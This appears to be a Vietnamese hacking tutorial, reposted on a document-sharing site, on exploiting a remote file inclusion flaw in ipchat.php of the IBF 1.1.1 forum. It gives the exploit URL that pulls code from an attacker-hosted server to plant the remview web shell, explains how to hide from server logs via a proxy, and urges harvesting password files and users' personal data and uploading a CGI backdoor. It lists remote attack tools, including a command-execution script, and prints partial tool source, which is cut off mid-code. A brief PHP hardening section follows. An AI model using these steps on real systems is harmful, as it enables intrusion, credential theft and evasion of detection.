Hack IBF 1: Hướng dẫn và Mẹo Hack IBF 1 hiệu quả

.Hack IBF 1.1.1 qua lỗi của file ipchat.php

trang này đã được đọc lần

http://[mục tiêu]/ipchat.php?root_path=http://www33.brinkster.com/nddt999/file/

sau đó bạn có thể xài remview qua địa chỉ:

htt://[mục tiêu]/conf_global.php?c=l

- để khai thác thành công lỗi này thì máy chủ phải cài forum ibf 1.1.1 chưa được patch lỗi code

injection trong file ipchat.php, php.ini : register_globals=on & allow_url_fopen=on

nguyên nhân do file lỗi code injection trong file ipchat.php. nội dung của file này như sau:

require $root_path."conf_global.php";>

...

nếu cái server nào chưa được patch lỗi này và cấu hình php cho đăng kí biến toàn cục + truy cập

file remote thì chúng ta có thể khai thác đại loại như sau:

http://[target]/ipchat?root_path=http://[attacker]/

cụ thể là http://[mục tiêu]/ipchat.php?root_path=http://www33.brinkster.com/nddt999/file

thì nó dòng "require ... ;" trong file ipchat.php sẽ là:

require "http://www33.brinkster.com/nddt999/file/conf_global.php";

file này sẽ thay đổi nội dung của file conf_global.php trên máy chủ và cài remview vào đây. ( bạn

xem 2 file http://www33.brinkster.com/nddt999/file/remview.php & base64.php sẽ rõ, file

remview.php bị thay đổi một chút xíu cho phù hợp)

- cho dù set quote đã được bật thì vẫn có thể khai thác được ở đây. hihi, bạn tham khảo source-

code của remview.php sẽ rõ!

- mình chỉ lợi dụng một chỗ hở của forum IBF thôi. đây là một đoạn trong file hướng dẫn cài đặt

"bạn phải chmod 777 cho thư mục uploads và file conf_global.php trước khi tiến hành cài đặt

forum". quá tệ phải không? mình đã thử upload file remview.php lên thư mục uploads nhưng nó

chỉ được set user/group là uid&gid đang có hiệu lực hiện tại, cụ thể là

owner/group=nobody/nobody. khi safe mode đã được bật, nếu chạy

http://target/uploads/remview.php thì nó chẳng chạy đâu do owner/group là nobody/nobody khác

với owner/group của thư mục hiện tại. vì vậy chỉ có thể kiếm cái file nào đó được chmod 777 mà

xài thôi. mình chọn conf_global.php do file này default được set permisions là 777

à lưu ý bạn chỉ nên chạy dòng "http://[mục tiêu]/ipchat.php?

root_path=http://www33.brinkster.com/nddt999/file/" MỘT LẦN DUY NHẤT!

nếu chạy "http://[mục tiêu]/ipchat.php?root_path=http://www33.brinkster.com/nddt999/file/" chúng

ta sẽ bị ghi nhất kí ngay. file .log của httpd như sau:

??/??/2003 - [111.222.333.444] GET /ipchat.php?

root_path=http://www33.brinkster.com/nddt999/file/ HTTP/1.0

để tránh ghi nhật kí khi khai thác, bạn tạo một file html như sau:

</form>

mở IE, set lại proxy là "proxy.ia2.marketscore.com" và sau đó chạy file html vừa tạo. ok, nhật kí

của httpd sẽ như sau:

??/??/2003 - proxy.ia2.marketscore.com [66.119.34.38] - POST /ipchat.php HTTP/1.0

thật sự thì họ chẳng biết địa chỉ ip của chúng ta và cũng chẳng biết được chúng ta đã cài

remview.php bằng cách nào nữa

- chúng ta tiếp tục với việc leo thang quyền. sau khi bạn upload file remview.php bạn có thể xài

đồ nghề này để đi kiếm chát vài thứ khác. các file bạn cần để ý đến là .passwd, passwords.txt,

users.txt, config.php, ... chúng ta sẽ thăm dò toàn bộ các file chứa username & password. bạn

cũng nên thu thập thêm vài thông tin khác như địa chỉ email, thông tin cá nhân của các users mà

bạn có thể truy cập đến trên server. một vấn đề nữa là bạn nên cố tìm trên server file .cgi, .pl gặp

lỗi (thường nằm trong thư mục cgi-bin) hoặc các thư mục cgi mà chúng ta có thể upload file cgi.

khi chế độ safemode đã được bật thì rất khó làm gì được. chúng ta nên chuyển sang xài cgi để

hack dễ hơn. hihi, bạn cố gắng upload backdoor cgitelnet.pl lên server để xài nha.

- một số đồ nghề php mà mình đã code (để hổ trợ cho hack code injection thôi). uh, mình quên

viết sql.php rồi

- http://www33.brinkster.com/nddt999/file/tree.php : dir tree, rất cần để tham dò toàn bộ cấu trúc

của thư mục public_html

- http://www33.brinkster.com/nddt999/file/phpinfo.php : xác định uid/gid đang có hiệu lực và lấy

thông tin từ hàm phpinfo();

- http://www33.brinkster.com/nddt999/file/dir.php : liệt kê 1 thư mục cụ thể

- http://www33.brinkster.com/nddt999/file/url.php : upload file qua url:// (http:// & ftp://)

- http://www33.brinkster.com/nddt999/file/view.php : xem nộ dung của 1 file cụ thể trên máy chủ

- http://www33.brinkster.com/nddt999/file/get.php : lấy file từ máy chủ về máy mình

- http://www33.brinkster.com/nddt999/file/cmd.php : thực thi lệnh hệ thống

mấy thứ này các bạn nên code lại tuỳ theo hoàn cảnh cụ thể của bạn. riêng mình thì mình thích

nhất là hai file tree.php & phpinfo.php mà mình đã code

* phòng thủ cho forum IBF của bạn (nói chung là cho PHP):

- xoá ngay file ipchat.php trên server

- chmod lại cho file conf_global.php là 755

- cấu hình lại file php.ini như sau:

allow_url_fopen=off // không có phép lấy file bằng url://

disable_functions=system passthru exec popen mail" // vô hiệu các hàm php nguy hiểm

display_errors=off // không hiện lỗi php để đề phòng trường hợp tiết lộ thông tin về thư mục đang

làm việc, dòng vấn tin sql gặp lỗi và một số thông tin khác ...

file_uploads=off // không cho phép upload file server (nếu bạn thấy không cần)

magic_quotes_gpc=on // bật quote

magic_quotes_runtime=on

magic_quotes_sybase=on

register_globals=off // không tự động đăng kí biến toàn cục

safe_mode=on // bật chế độ an toàn cho PHP

safe_mode_exec_dir=/usr/none // không cho thi hành lệnh hệ thống, bạn thay "/usr/none" thành

tên thư mục nào khác mà không chứa gì hết có gì hết và đã được set quyền an toàn

safe_mode_gid=on // bật chế độ an toàn so sánh gid/uid trước khi chạy kịch bản php

sql.safe_mode=on // bật chế độ an toàn trước khi vấn tin sql

Sockets Support = disabled // vô hiệu các hàm liên quan đến socket nếu ban không bao giờ dùng

đến.

bạn nên tham khảo thêm tài liệu php về hai hàm set_magic_quotes_runtime(1); & ini_set()

Code các file trên :

------- tree.php - Code by vkdt -------

error_reporting(2047);

set_magic_quotes_runtime(0);

@set_time_limit(0);

@ini_set('max_execution_time',0);

if (function_exists("ob_start")) ob_start("ob_gzhandler");

$autovars1="path";

foreach (explode(" ",$autovars1) as $k=>$v)

if (isset($HTTP_POST_VARS[$v])) $$v=$HTTP_POST_VARS[$v];

elseif (isset($HTTP_GET_VARS[$v])) $$v=$HTTP_GET_VARS[$v];

elseif (isset($HTTP_COOKIE_VARS[$v])) $$v=$HTTP_COOKIE_VARS[$v];

$autovars2="path";

if (get_magic_quotes_runtime() || get_magic_quotes_gpc())

foreach (explode(" ",$autovars2) as $k=>$v)

if (isset($$v)) $$v=stripslashes($$v);

if (!isset($path)) $path=realpath(".");

$path=str_replace("\\","/",$path);

$html=<<<html

<html>

<head>

<style>

body,td{font-family:Fixedsys}

a{color:#0000ff}

</style>

</head>

html;

echo $html;

dir_tree($path);

$html=<<<html

</body>

</html>

html;

echo $html;

exit;

function dir_tree($df) {

$dirs=array();

$files=array();

if ($dir=@opendir($df)) {

while (($file=readdir($dir))!=false) {

if ($file=="." || $file=="..") continue;

if (@is_dir("$df/$file")) {

$dirs[]=$file;

} elseif (@is_file("$df/$file")) {

$files[]=$file;

}

closedir($dir);

sort($dirs);

sort($files);

if (count($dirs) || count($files)) {

$perms=get_perms(fileperms($df));

if (function_exists("posix_getpwuid")) {

$uid=posix_getpwuid(fileowner($df));

$owner=$uid["name"];

} else $owner="";

if (function_exists("posix_getgrgid")) {

$gid=posix_getgrgid(filegroup($df));

$group=$gid["name"];

} else $group="";

if ($owner=="" && $owner=="") $more=$perms;

else $more="$owner/$group $perms";

$html=<<<html

<p>$df ($more)

<td align=center><font color=#FFFF00>Modify</font></td>

<td align=center><font color=#FFFF00>Owner/Group</font></td>

<td align=center><font color=#FFFF00>Perms</font></td>

</tr>

Hack IBF 1

Tham khảo tài liệu 'hack ibf 1', công nghệ thông tin, an ninh - bảo mật phục vụ nhu cầu học tập, nghiên cứu và làm việc hiệu quả

Chủ đề:

Tài liệu liên quan

Tài liêu mới

AI tóm tắt

Giới thiệu tài liệu

Đối tượng sử dụng

Từ khoá chính

Nội dung tóm tắt

Hỗ trợ

Phương thức thanh toán

Theo dõi chúng tôi